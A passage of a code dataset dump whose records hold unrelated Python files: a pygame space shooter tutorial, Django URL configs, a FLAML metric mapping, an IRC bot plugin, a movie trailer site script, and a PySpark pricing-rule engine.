NNEIGHMAX=max(18, int((LAMBDA+2)*10))\n if LAMBDA > 4.0:\n NNEIGHMAX=200\n print(\"Setting NNEIGHMAX to : {0}\".format(NNEIGHMAX))\n call(\"sed -i.bck 's/NNEIGHREPLACEME/{0}/' {1}/INPUT/general_conf.yaml\".format(NNEIGHMAX, DIRNAME), shell=True)\n\nprint(\"Done.\")\n","sub_path":"dem-simuls/2018-04-29-iso-better_granulometry/generate_granulo_iso_simuls.py","file_name":"generate_granulo_iso_simuls.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"261430164","text":"# Shmup - Part 21\n# organize code - move to game object and separate methods for new, draw, update, etc\n# see \"pg template(advanced).py\" for details\n# by KidsCanCode 2015\n# A space shmup in multiple parts\n# For educational purposes only\n# Art from Kenney.nl\n# Frozen Jam by tgfcoder licensed under CC-BY-3\n\nimport pygame as pg\nimport random\nimport sys\nfrom os import path\n\nsound_dir = path.join(path.dirname(__file__), 'snd')\nimg_dir = path.join(path.dirname(__file__), 'img')\n\n# define some colors (R, G, B)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nYELLOW = (255, 255, 0)\n\n# game settings\nWIDTH = 
480\nHEIGHT = 600\nFPS = 60\nTITLE = \"SHMUP\"\nBGCOLOR = BLACK\nPOWERUP_TIME = 5000\n\ndef draw_text(surf, text, size, x, y):\n # generic function to draw some text\n font_name = pg.font.match_font('arial')\n font = pg.font.Font(font_name, size)\n text_surface = font.render(text, True, WHITE)\n text_rect = text_surface.get_rect()\n text_rect.midtop = (x, y)\n surf.blit(text_surface, text_rect)\n\ndef draw_shield_bar(surf, x, y, pct):\n if pct < 0:\n pct = 0\n BAR_LENGTH = 100\n BAR_HEIGHT = 10\n fill = (pct / 100) * BAR_LENGTH\n outline_rect = pg.Rect(x, y, BAR_LENGTH, BAR_HEIGHT)\n fill_rect = pg.Rect(x, y, fill, BAR_HEIGHT)\n pg.draw.rect(surf, GREEN, fill_rect)\n pg.draw.rect(surf, WHITE, outline_rect, 2)\n\ndef draw_lives(surf, img, x, y, lives):\n for i in range(lives):\n img_rect = img.get_rect()\n img_rect.x = x + 30 * i\n img_rect.y = y\n surf.blit(img, img_rect)\n\n############ DEFINE SPRITES ############\nclass Player(pg.sprite.Sprite):\n # player sprite - moves left/right, shoots\n def __init__(self, game, *groups):\n pg.sprite.Sprite.__init__(self, *groups)\n self.game = game\n self.image = pg.transform.scale(game.player_image, (50, 38))\n self.rect = self.image.get_rect()\n self.radius = 22\n # uncomment to test the radius\n # pg.draw.circle(self.image, RED, self.rect.center, self.radius)\n self.rect.centerx = WIDTH / 2\n self.rect.bottom = HEIGHT - 10\n self.speedx = 0\n self.shield = 100\n self.shoot_delay = 250\n self.last_shot = pg.time.get_ticks()\n self.power = 1\n self.power_time = pg.time.get_ticks()\n self.lives = 3\n self.hidden = False\n self.hide_timer = pg.time.get_ticks()\n\n def hide(self):\n # hide player temporarily\n self.hidden = True\n self.hide_timer = pg.time.get_ticks()\n self.loc = self.rect.center\n self.rect.center = (WIDTH / 2, HEIGHT + 200)\n\n def update(self):\n # unhide if hidden\n if self.hidden and pg.time.get_ticks() - self.hide_timer > 1000:\n self.hidden = False\n self.rect.center = self.loc\n # timeout for powerups\n if self.power >= 2 and pg.time.get_ticks() - self.power_time > POWERUP_TIME:\n self.power -= 1\n self.power_time = pg.time.get_ticks()\n # only move if arrow key is pressed\n self.speedx = 0\n keystate = pg.key.get_pressed()\n if keystate[pg.K_LEFT]:\n self.speedx = -5\n if keystate[pg.K_RIGHT]:\n self.speedx = 5\n if keystate[pg.K_SPACE]:\n self.shoot()\n\n # move the sprite\n self.rect.x += self.speedx\n # stop at the edges\n if self.rect.right > WIDTH:\n self.rect.right = WIDTH\n if self.rect.left < 0:\n self.rect.left = 0\n\n def powerup(self):\n self.game.power_sound.play()\n self.power += 1\n self.power_time = pg.time.get_ticks()\n\n def shoot(self):\n now = pg.time.get_ticks()\n if not self.hidden and now - self.last_shot > self.shoot_delay:\n self.last_shot = now\n if self.power == 1:\n self.shoot_delay = 250\n Bullet(self.game.bullet_image, self.rect.centerx, self.rect.top,\n [self.game.all_sprites, self.game.bullets])\n self.game.pew_sound.play()\n if self.power == 2:\n self.shoot_delay = 250\n Bullet(self.game.bullet_image, self.rect.left, self.rect.centery,\n [self.game.all_sprites, self.game.bullets])\n Bullet(self.game.bullet_image, self.rect.right, self.rect.centery,\n [self.game.all_sprites, self.game.bullets])\n self.game.pew_sound.play()\n if self.power >= 3:\n self.shoot_delay = 150\n Bullet(self.game.bullet_image, self.rect.left, self.rect.centery,\n [self.game.all_sprites, self.game.bullets])\n Bullet(self.game.bullet_image, self.rect.right, self.rect.centery,\n [self.game.all_sprites, 
self.game.bullets])\n Bullet(self.game.bullet_image, self.rect.centerx, self.rect.top,\n [self.game.all_sprites, self.game.bullets])\n self.game.pew_sound.play()\n\nclass Mob(pg.sprite.Sprite):\n # mob sprite - spawns above top and moves downward\n def __init__(self, images, *groups):\n pg.sprite.Sprite.__init__(self, *groups)\n self.image0 = random.choice(images)\n self.image0.set_colorkey(BLACK)\n self.image = self.image0.copy()\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width * 0.85 / 2)\n # uncomment to test the radius\n # pg.draw.circle(self.image, RED, self.rect.center, self.radius)\n self.rect.x = random.randrange(WIDTH - self.rect.width)\n self.rect.y = random.randrange(-80, -50)\n self.speedx = random.randrange(-3, 3)\n self.speedy = random.randrange(1, 8)\n self.rot = 0\n self.rot_speed = random.randrange(-10, 10)\n self.last_update = pg.time.get_ticks()\n\n def rotate(self):\n now = pg.time.get_ticks()\n if now - self.last_update > 50:\n self.last_update = now\n self.rot = (self.rot + self.rot_speed) % 360\n new_image = pg.transform.rotate(self.image0, self.rot)\n old_center = self.rect.center\n self.image = new_image\n self.rect = self.image.get_rect()\n self.rect.center = old_center\n\n def update(self):\n self.rotate()\n self.rect.x += self.speedx\n self.rect.y += self.speedy\n if self.rect.top > HEIGHT or self.rect.right < 0 or self.rect.left > WIDTH:\n self.rect.y = random.randrange(-80, -50)\n self.rect.x = random.randrange(WIDTH - self.rect.width)\n self.speedy = random.randrange(1, 8)\n\nclass Bullet(pg.sprite.Sprite):\n def __init__(self, img, x, y, *groups):\n pg.sprite.Sprite.__init__(self, *groups)\n self.image = img\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.rect.bottom = y\n self.rect.centerx = x\n self.speedy = -10\n\n def update(self):\n self.rect.y += self.speedy\n # kill if off top of screen\n if self.rect.bottom < 0:\n self.kill()\n\nclass Powerup(pg.sprite.Sprite):\n def __init__(self, images, *groups):\n pg.sprite.Sprite.__init__(self, *groups)\n self.type = random.choice(['shield', 'gun'])\n self.image = images[self.type]\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.rect.bottom = -20\n self.rect.x = random.randrange(WIDTH - self.rect.width)\n self.speedy = 3\n\n def update(self):\n self.rect.y += self.speedy\n # kill if off bottom of screen\n if self.rect.top > HEIGHT:\n self.kill()\n\nclass Explosion(pg.sprite.Sprite):\n def __init__(self, anim, center, size, *groups):\n pg.sprite.Sprite.__init__(self, *groups)\n self.anim = anim\n self.size = size\n self.image = anim[self.size][0]\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.frame = 0\n self.last_update = pg.time.get_ticks()\n self.frame_rate = 75\n\n def update(self):\n now = pg.time.get_ticks()\n if now - self.last_update > self.frame_rate:\n self.last_update = now\n self.frame += 1\n if self.frame == len(self.anim[self.size]):\n self.kill()\n else:\n center = self.rect.center\n self.image = self.anim[self.size][self.frame]\n self.rect = self.image.get_rect()\n self.rect.center = center\n\n# initialize pg\npg.init()\npg.mixer.init()\n\n\nclass Game:\n # The Game object will initialize the game, run the game loop,\n # and display start/end screens\n\n def __init__(self):\n # initialize the game and create the window\n self.screen = pg.display.set_mode((WIDTH, HEIGHT))\n pg.display.set_caption(TITLE)\n # start the clock\n self.clock = pg.time.Clock()\n self.load_data()\n\n def new(self):\n # 
initialize all your variables and do all the setup for a new game\n self.all_sprites = pg.sprite.Group()\n self.mobs = pg.sprite.Group()\n self.bullets = pg.sprite.Group()\n self.powerups = pg.sprite.Group()\n\n self.player = Player(self, [self.all_sprites])\n for i in range(15):\n Mob(self.meteor_images, [self.all_sprites, self.mobs])\n self.score = 0\n self.last_powerup = pg.time.get_ticks()\n pg.mixer.music.play(loops=-1)\n\n def load_data(self):\n # load all your assets (sounds, images, etc.)\n self.pew_sound = pg.mixer.Sound(path.join(sound_dir, 'pew.wav'))\n self.shield_sound = pg.mixer.Sound(path.join(sound_dir, 'pow4.wav'))\n self.power_sound = pg.mixer.Sound(path.join(sound_dir, 'pow5.wav'))\n self.player_die_sound = pg.mixer.Sound(path.join(sound_dir, 'rumble1.ogg'))\n self.expl_sounds = []\n for snd in ['expl3.wav', 'expl6.wav']:\n self.expl_sounds.append(pg.mixer.Sound(path.join(sound_dir, snd)))\n pg.mixer.music.load(path.join(sound_dir, 'tgfcoder-FrozenJam-SeamlessLoop.ogg'))\n pg.mixer.music.set_volume(0.4)\n self.background = pg.image.load(path.join(img_dir, 'starfield.png')).convert()\n self.background_rect = self.background.get_rect()\n self.player_image = pg.image.load(path.join(img_dir, 'playerShip1_orange.png')).convert()\n self.player_image.set_colorkey(BLACK)\n self.player_mini_image = pg.transform.scale(self.player_image, (25, 19))\n self.bullet_image = pg.image.load(path.join(img_dir, 'laserRed16.png')).convert()\n meteor_list = ['meteorBrown_med3.png', 'meteorBrown_med1.png',\n 'meteorBrown_small2.png', 'meteorBrown_tiny1.png']\n self.meteor_images = []\n for img in meteor_list:\n self.meteor_images.append(pg.image.load(path.join(img_dir, img)).convert())\n self.powerup_images = {}\n self.powerup_images['shield'] = pg.image.load(path.join(img_dir, 'shield_gold.png')).convert()\n self.powerup_images['gun'] = pg.image.load(path.join(img_dir, 'bolt_gold.png')).convert()\n self.explosion_anim = {}\n self.explosion_anim['lg'] = []\n self.explosion_anim['sm'] = []\n self.explosion_anim['player'] = []\n for i in range(9):\n img = pg.image.load(path.join(img_dir, 'regularExplosion0{}.png'.format(i))).convert()\n img.set_colorkey(BLACK)\n img1 = pg.transform.scale(img, (75, 75))\n self.explosion_anim['lg'].append(img1)\n img2 = pg.transform.scale(img, (32, 32))\n self.explosion_anim['sm'].append(img2)\n img = pg.image.load(path.join(img_dir, 'sonicExplosion0{}.png'.format(i))).convert()\n img.set_colorkey(BLACK)\n self.explosion_anim['player'].append(img)\n\n def run(self):\n # The Game loop - set self.running to False to end the game\n self.running = True\n while self.running:\n self.clock.tick(FPS)\n self.events()\n self.update()\n self.draw()\n\n def quit(self):\n pg.quit()\n sys.exit()\n\n def update(self):\n # the update part of the game loop\n self.all_sprites.update()\n\n # check if bullets hit mobs\n hits = pg.sprite.groupcollide(self.mobs, self.bullets, True, True)\n for hit in hits:\n # more points for smaller hits\n self.score += 25 - hit.radius\n Explosion(self.explosion_anim, hit.rect.center, 'lg', [self.all_sprites])\n random.choice(self.expl_sounds).play()\n Mob(self.meteor_images, [self.all_sprites, self.mobs])\n\n # check if mobs hit player\n hits = pg.sprite.spritecollide(self.player, self.mobs, True, pg.sprite.collide_circle)\n for hit in hits:\n self.player.shield -= hit.radius * 2\n Explosion(self.explosion_anim, hit.rect.center, 'sm', [self.all_sprites])\n Mob(self.meteor_images, [self.all_sprites, self.mobs])\n\n if self.player.shield <= 0:\n # spawn 
a player explosion and delete the player sprite\n self.player_die_sound.play()\n self.death_explosion = Explosion(self.explosion_anim, self.player.rect.center, 'player', [self.all_sprites])\n self.player.hide()\n self.player.lives -= 1\n self.player.shield = 100\n self.player.power = 1\n # if player died and explosion finished\n if self.player.lives == 0 and not self.death_explosion.alive():\n self.running = False\n pg.mixer.music.stop()\n\n # check if player hits powerup\n hits = pg.sprite.spritecollide(self.player, self.powerups, True)\n for hit in hits:\n if hit.type == 'shield':\n self.player.shield += 20\n self.shield_sound.play()\n if self.player.shield > 100:\n self.player.shield = 100\n if hit.type == 'gun':\n self.player.powerup()\n\n # spawn a powerup (maybe)\n now = pg.time.get_ticks()\n if now - self.last_powerup > 3000 and random.random() > 0.99:\n self.last_powerup = now\n Powerup(self.powerup_images, [self.all_sprites, self.powerups])\n\n def draw(self):\n # draw everything to the screen\n self.screen.fill(BGCOLOR)\n self.screen.blit(self.background, self.background_rect)\n self.all_sprites.draw(self.screen)\n score_text = str(self.score)\n draw_text(self.screen, score_text, 18, WIDTH / 2, 10)\n draw_shield_bar(self.screen, 5, 5, self.player.shield)\n draw_lives(self.screen, self.player_mini_image, WIDTH - 100, 5, self.player.lives)\n pg.display.flip()\n\n def events(self):\n # catch all events here\n for event in pg.event.get():\n # this one checks for the window being closed\n if event.type == pg.QUIT:\n self.quit()\n\n def show_start_screen(self):\n # show the start screen\n pass\n\n def show_go_screen(self):\n # show the game over screen\n pass\n\n# create the game object\ng = Game()\nwhile True:\n g.show_start_screen()\n g.new()\n g.run()\n g.show_go_screen()\n","sub_path":"shmup/shmup-21.py","file_name":"shmup-21.py","file_ext":"py","file_size_in_byte":15425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"277383851","text":"\"\"\"crudexample URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom . 
import views\n\nurlpatterns = [\n path('login/', views.login, name='login'),\n path('vista_turnos/', views.turnos, name='turnos'),\n path('detalle_turnos/', views.vista_edicion_turnos, name='detalle_turnos'),\n path('vista_pacientes/', views.pacientes, name='pacientes'),\n path('detalle_pacientes/', views.vista_edicion_pacientes, name='detalle_pacientes'),\n path('vista_pedidos/', views.pedidos, name='pedidos'),\n path('detalle_pedidos/', views.vista_edicion_pedidos, name='detalle_pedidos'),\n path('menu_principal/', views.menu_principal, name='menu_principal'),\n path('zinggrid/', views.zinggrid, name='zinggrid'),\n path('detalle_heroes/', views.vista_edicion_heroes, name='detalle_heroes'),\n path('vista_historial/', views.historial, name='historial'),\n path('detalle_historial/', views.vista_edicion_historial, name='detalle_historial'),\n path('admin/', admin.site.urls),\n path('', include('myapi.urls')),\n path('', include('usuario.urls')),\n \n \n ]","sub_path":"crudexample/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"556372422","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import patterns\nfrom django.conf.urls import url\n\nfrom networkapi.api_neighbor.v4 import views\n\nurlpatterns = patterns(\n '',\n url(r'^neighbor/deploy/((?P[;\\w]+)/)?$',\n views.NeighborDeployView.as_view()),\n url(r'^neighbor/((?P[;\\w]+)/)?$',\n views.NeighborDBView.as_view()),\n\n)\n","sub_path":"networkapi/api_neighbor/v4/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"19234192","text":"# https://github.com/huggingface/datasets/blob/master/metrics/glue/glue.py\nfrom collections import OrderedDict\nimport typing\n\nmetric_mode_mapping_glue = {\n \"cola\": [(\"matthews_correlation\", \"max\")],\n \"mnli\": [(\"accuracy\", \"max\")],\n \"mrpc\": [(\"accuracy\", \"max\"), (\"f1\", \"max\")],\n \"qnli\": [(\"accuracy\", \"max\")],\n \"qqp\": [(\"accuracy\", \"max\"), (\"f1\", \"max\")],\n \"rte\": [(\"accuracy\", \"max\")],\n \"sst2\": [(\"accuracy\", \"max\")],\n \"stsb\": [(\"pearson\", \"max\"), (\"spearmanr\", \"max\")],\n \"wnli\": [(\"accuracy\", \"max\")]\n}\n\nmetric_mode_mapping_squad = [(\"exact_match\", \"max\"), (\"f1\", \"max\")]\n\nmetric_mode_mapping_super_glue = {\n \"axb\": [(\"matthews_correlation\", \"max\")],\n \"cb\": [(\"accuracy\", \"max\"), (\"f1\", \"max\")],\n \"copa\": [(\"accuracy\", \"max\")],\n \"rte\": [(\"accuracy\", \"max\")],\n \"wic\": [(\"accuracy\", \"max\")],\n \"wsc\": [(\"accuracy\", \"max\")],\n \"wsc.fixed\": [(\"accuracy\", \"max\")],\n \"boolq\": [(\"accuracy\", \"max\")],\n \"axg\": [(\"accuracy\", \"max\")]\n}\n\nmetric_mode_mapping_imdb = [(\"accuracy\", \"max\")]\n\nmetric_mode_mapping_yelp = [(\"accuracy\", \"max\")]\n\nMETRIC_MAPPING = OrderedDict(\n [\n (\"squad\", metric_mode_mapping_squad),\n (\"glue\", metric_mode_mapping_glue),\n (\"super_glue\", metric_mode_mapping_super_glue),\n (\"imdb\", metric_mode_mapping_imdb),\n (\"yelp_review_full\", metric_mode_mapping_yelp)\n ]\n)\n\n\ndef get_default_and_alternative_metric(dataset_name_list: typing.List,\n subdataset_name=None,\n custom_metric_name=None,\n custom_metric_mode_name=None):\n from ..result_analysis.azure_utils import JobID\n dataset_name = JobID.dataset_list_to_str(dataset_name_list)\n if dataset_name not in METRIC_MAPPING.keys():\n 
assert custom_metric_name and custom_metric_mode_name, \\\n \"The dataset is not in {}, you must explicitly specify \" \\\n \"the custom_metric_name and custom_metric_mode_name\".format(\",\".join(METRIC_MAPPING.keys()))\n eval_name_mapping = METRIC_MAPPING[dataset_name]\n if isinstance(eval_name_mapping, dict):\n assert subdataset_name and subdataset_name in eval_name_mapping, \\\n \"dataset_name and subdataset_name not correctly specified\"\n default_metric, default_mode = eval_name_mapping[subdataset_name][0]\n all_metrics, all_mode \\\n = [x[0] for x in eval_name_mapping[subdataset_name]] \\\n + [\"loss\"], [x[1] for x in eval_name_mapping[subdataset_name]] + [\"min\"]\n\n return default_metric, default_mode, all_metrics, all_mode\n else:\n assert isinstance(eval_name_mapping, list), \"dataset_name and subdataset_name not correctly specified\"\n\n default_metric, default_mode = eval_name_mapping[0]\n all_metrics, all_mode = [x[0] for x in eval_name_mapping] + [\"loss\"], \\\n [x[1] for x in eval_name_mapping] + [\"min\"]\n\n return default_metric, default_mode, all_metrics, all_mode\n","sub_path":"flaml/nlp/dataset/metric_auto.py","file_name":"metric_auto.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"154059099","text":"def main(data):\n args = False\n coms = [\"!G+\", \"!g+\"]\n if any(word.lower() in data['recv'].lower() for word in data['config']['settings']['blocklist']):\n return\n for com in coms:\n if com in data['recv']:\n args = argv(com, data['recv'])\n break\n if args:\n return say(args['channel'],\n 'https://plus.google.com/'\\\n 'hangouts/_/event/ch7k2ara9stvm6q0ubs7crkov9c'\n )\n","sub_path":"plugins/privmsg/hangout.py","file_name":"hangout.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"57833255","text":"import fresh_tomatoes\nimport media\n\"\"\"\nThis python file creates instances of a movie class to hold a large amount\nof important features. 
All movies are then put into a list and\nsent to the fresh_tomatoes python file.\n\"\"\"\n \ndespicable_me = media.Movie(\"Despicable Me\",\n                            \"Gru finds that life isn't just about evil \"\n                            \"when he adopts three orphans and tries to pull off \"\n                            \"the greatest evil theft of all time.\",\n                            \"https://goo.gl/Itkltl\",  # Google shortener link \n                            \"https://www.youtube.com/watch?v=RXZY_XRjABs\",\n                            4, \"$251.5M\")\n\nwreck_it_ralph = media.Movie(\"Wreck-it Ralph\",\n                             \"A video game enemy decides to become his own \"\n                             \"hero and no longer be the \"\n                             \"bad guy of video games.\",\n                             \"https://goo.gl/tb6Z5P\",\n                             \"https://www.youtube.com/watch?v=87E6N7ToCxs\",\n                             4, \"$189.4M\")\n\nbig_hero_six = media.Movie(\"Big Hero 6\",\n                           \"Hiro uses a robot built by his brother to fight \"\n                           \"an evil villain along with his friends with \"\n                           \"futuristic gadgets.\",\n                           \"https://goo.gl/bMv6Mb\",\n                           \"https://www.youtube.com/watch?v=z3biFxZIJOQ\",\n                           4, \"$222.5M\")\n\n# Make a list of all my favourite movies\nmovies = [despicable_me, wreck_it_ralph, big_hero_six]\n# Run open_movies_page from 'fresh_tomatoes.py'\nfresh_tomatoes.open_movies_page(movies)\n\n\n","sub_path":"entertainment.py","file_name":"entertainment.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"241185136","text":"from harlem125 import dp_rules as dpr\nfrom typing import List, Dict, Tuple\nfrom harlem125.exception_class import DP_Function_Definition_Err, DP_Rule_Check_Err\nfrom harlem125 import dp_util\nfrom functools import partial\nimport numpy as np\nfrom pyspark.sql.window import Window\nimport pyspark.sql.functions as F\nimport pyspark.sql.types as T\nfrom pyspark.sql import DataFrame\nimport time, datetime as dt\nimport pytz\nimport math\n\n\nclass Working_func_ext(dpr.Working_func):\n    def __init__(self, pyfunc, desc=None):\n        if desc is None:\n            if type(pyfunc) == partial:\n                desc = ' ----> '.join([x.desc for x in pyfunc.keywords['func_lst']])\n            else:\n                raise ValueError('Working_func desc cannot be empty')\n        super().__init__(pyfunc, desc)\n\n\nclass min_margin_template:\n    @staticmethod\n    def apply_rule(df: DataFrame, min_margin_udf):\n        return df \\\n            .select('*',\n                    min_margin_udf(\n                        F.struct([df[x] for x in\n                                  df.columns])\n                    ).alias('min_margin')\n                    ) \\\n            .select([c for c in df.columns] + \\\n                    [F.col('min_margin.value').alias('min_margin'),\n                     F.col('min_margin.rule_name').alias('min_margin_rule_name')])\n\n    @staticmethod\n    def get_static_mm_udf(min_margin_mapping_input):\n        def min_margin_mapping_index(row, min_margin_mapping):\n            try:\n                rettpl = min_margin_mapping(row)\n                if type(rettpl) != tuple or len(rettpl) != 2:\n                    raise DP_Function_Definition_Err('Function return value must be a tuple of length 2')\n                return rettpl\n            except KeyError as e:\n                raise\n            except DP_Function_Definition_Err:\n                raise\n            except Exception as e:\n                return None, str(e)\n\n        min_margin_mapping_partial = partial(min_margin_mapping_index, min_margin_mapping=min_margin_mapping_input)\n        return F.udf(min_margin_mapping_partial, returnType=T.StructType.fromJson(\n            {'fields': [\n                {'metadata': {}, 'name': 'value', 'nullable': True, 'type': 'double'},\n                {'metadata': {}, 'name': 'rule_name', 'nullable': True, 'type': 'string'}\n            ],\n                'type': 'struct'}))\n\n\nclass min_comp_template:\n    @staticmethod\n    def apply_rule(df: DataFrame, min_comp_udf):\n        def median(values_list):\n            med = np.median(values_list)\n            retval = float(med)\n            if math.isnan(retval):\n                return None\n            return 
retval\n\n def group_concat(comp_name_lst):\n if comp_name_lst is None:\n return None\n else:\n return ','.join(comp_name_lst)\n\n udf_median = F.udf(median, T.DoubleType())\n udf_group_concat = F.udf(group_concat, T.StringType())\n price_window = (Window\n .partitionBy('div_no', 'itm_no')\n .orderBy('price'))\n\n base_raw = df.select('*',\n F.row_number().over(price_window) \\\n .alias('rn')) \\\n .filter('rn == 1') \\\n .drop('rn', 'price', 'comp_name')\n\n min_comp_all_raw = df \\\n .select('div_no', 'itm_no',\n 'price', 'comp_name',\n min_comp_udf(\n F.struct([df[x] for x in\n df.columns])\n ).alias('in_list')\n ) \\\n .filter('in_list.value').drop('in_list')\n\n min_comp_all = min_comp_all_raw \\\n .select('div_no', 'itm_no',\n F.col('price').alias('min_comp'),\n F.col('comp_name').alias('min_comp_NM'),\n F.rank().over(price_window) \\\n .alias('rn')) \\\n .filter('rn == 1') \\\n .drop('rn') \\\n .groupBy(['div_no', 'itm_no']) \\\n .agg(F.first(F.col('min_comp')).alias('min_comp'),\n udf_group_concat(F.collect_list(F.col('min_comp_NM'))).alias('min_comp_NM'))\n\n min_comp_mm = min_comp_all_raw \\\n .filter('price >= min_margin') \\\n .select('div_no', 'itm_no',\n F.col('price').alias('min_comp_MM'),\n F.col('comp_name').alias('min_comp_MM_NM'),\n F.rank().over(price_window) \\\n .alias('rn')) \\\n .filter('rn == 1') \\\n .drop('rn') \\\n .groupBy(['div_no', 'itm_no']) \\\n .agg(F.first(F.col('min_comp_MM')).alias('min_comp_MM'),\n udf_group_concat(F.collect_list(F.col('min_comp_MM_NM'))).alias('min_comp_MM_NM'))\n\n median_df = df.groupby(['div_no', 'itm_no']) \\\n .agg(udf_median(F.collect_list(F.col('price'))).alias('median_comp'))\n avg_max_df = min_comp_all_raw.groupby(['div_no', 'itm_no']) \\\n .agg(F.avg(F.col('price')).alias('avg_comp'), F.max(F.col('price')).alias('max_comp'))\n # max_df = min_comp_all_raw.groupby(['div_no', 'itm_no']) \\\n # .agg(F.max(F.col('price')).alias('max_comp'))\n\n return base_raw \\\n .join(min_comp_all, on=['div_no', 'itm_no'], how='left') \\\n .join(min_comp_mm, on=['div_no', 'itm_no'], how='left') \\\n .join(avg_max_df, on=['div_no', 'itm_no'], how='left') \\\n .join(median_df, on=['div_no', 'itm_no'], how='left')\n\n @staticmethod\n def get_min_comp_udf(min_comp_mapping_input):\n def min_comp_mpping_index(row, min_comp_mapping):\n try:\n rettpl = min_comp_mapping(row)\n if type(rettpl) != tuple or len(rettpl) != 2:\n raise DP_Function_Definition_Err('Function return value must be a tuple and length of 2')\n return rettpl\n except KeyError as e:\n raise\n except DP_Function_Definition_Err:\n raise\n except Exception as e:\n return False, str(e)\n\n min_comp_mpping_index_partial = \\\n partial(min_comp_mpping_index, min_comp_mapping=min_comp_mapping_input)\n return F.udf(min_comp_mpping_index_partial, returnType=T.StructType.fromJson(\n {\n 'fields': [\n {'metadata': {}, 'name': 'value', 'nullable': True, 'type': 'boolean'},\n {'metadata': {}, 'name': 'rule_name', 'nullable': True, 'type': 'string'}\n ],\n 'type': 'struct'\n }\n ))\n\n\nclass DP_Rule_Constructor:\n def __init__(self, rule_level, scope, rule_name, additional_source: dict = None, critical=False,\n rule_start_dt=None, rule_end_dt=None, is_active=None,\n\n desc='', *args, **kwargs):\n\n self.sears_online_rule_schema = [\n # TODO: DEFINE rule name and schema here\n ('pre_rule', 'boolean'),\n ('core_rule', 'double'),\n ('uplift_rule', 'double'),\n ('post_rule', 'double'),\n ('deal_flag_rule', 'string'),\n ('day_range_rule', 'integer'),\n ('priority', 'integer')\n ] # type: 
List[Tuple[str,str]]\n\n target_tbl_name = 'rule_table'\n if_exists = 'append'\n self.scope = scope\n rule_active = True if is_active is None else is_active\n inactive_reason = '' if is_active is None else 'Preset: OFF'\n time_now = (dt.datetime.now(pytz.timezone('America/Chicago'))).replace(tzinfo=None)\n self.time_now = time_now\n self.rule_start_dt = dt.datetime(*tuple(time.gmtime(0)[:6])) if rule_start_dt is None else rule_start_dt\n rule_end_dt = dt.datetime(9999, 12, 31, 23, 59, 59) if rule_end_dt is None else rule_end_dt\n self.rule_end_dt = rule_end_dt.replace(hour=23, minute=59, second=59) # Extend enddate to oneday\n # time check\n if rule_active is True:\n if not self.rule_start_dt < time_now < self.rule_end_dt:\n rule_active, inactive_reason = \\\n False, 'Rule inactive [{}, {}]'.format(self.rule_start_dt.strftime('%Y-%m-%d %H:%M:%S'),\n self.rule_end_dt.strftime('%Y-%m-%d %H:%M:%S'))\n\n # additional_source check\n if rule_active is True:\n if additional_source is not None:\n try:\n assert type(additional_source) == dict, \\\n 'additional_source type error, expect dict got {}'.format(type(additional_source))\n\n if len(additional_source) > 0:\n for key, item in additional_source.items():\n assert 'table_name' in item and 'key' in item, 'additional_source format error'\n if dp_util.tbl_exists(item['table_name']) is False:\n raise DP_Rule_Check_Err('Table {} not found'.format(item['table_name']))\n except (DP_Rule_Check_Err, AssertionError) as e:\n rule_active = False\n inactive_reason = str(e)\n if critical:\n raise\n # TODO: DEFINE rule_level prefix, may cause column name duplication when multiple interfaces exists\n self.rule_level_prefix = ''\n self.thisrule = dpr.Harlem_Rule(\n target_tbl_name=target_tbl_name,\n additional_source=additional_source,\n select_schema=(\n # TODO: DEFINE schema for rule_table here\n 'div_no',\n 'itm_no',\n 'reg', # redundant\n 'cost_with_subsidy', # redundant\n 'min_margin',\n 'min_margin_rule_name',\n 'min_comp_MM',\n 'min_comp_MM_NM',\n 'min_comp',\n 'min_comp_NM',\n 'avg_comp',\n 'max_comp',\n 'median_comp',\n 'uplift',\n 'Harlem_Rule.pre_rule_value as pre_rule_value',\n 'Harlem_Rule.pre_rule_name as pre_rule_name',\n 'Harlem_Rule.core_rule_value as core_rule_value',\n 'Harlem_Rule.core_rule_name as core_rule_name',\n 'Harlem_Rule.uplift_rule_value as uplift_rule_value',\n 'Harlem_Rule.uplift_rule_name as uplift_rule_name',\n 'Harlem_Rule.post_rule_value as post_rule_value',\n 'Harlem_Rule.post_rule_name as post_rule_name',\n 'Harlem_Rule.deal_flag_rule_value as deal_flag_value',\n 'Harlem_Rule.deal_flag_rule_name as deal_flag_rule_name',\n 'Harlem_Rule.day_range_rule_value as day_range',\n 'Harlem_Rule.day_range_rule_name as day_range_rule_name',\n 'Harlem_Rule.priority_value as priority',\n 'Harlem_Rule.priority_name as priority_rule_name',\n '{}rule_level'.format(self.rule_level_prefix),\n 'run_id'),\n is_active=rule_active,\n inactive_rsn=inactive_reason,\n rule_level=rule_level,\n 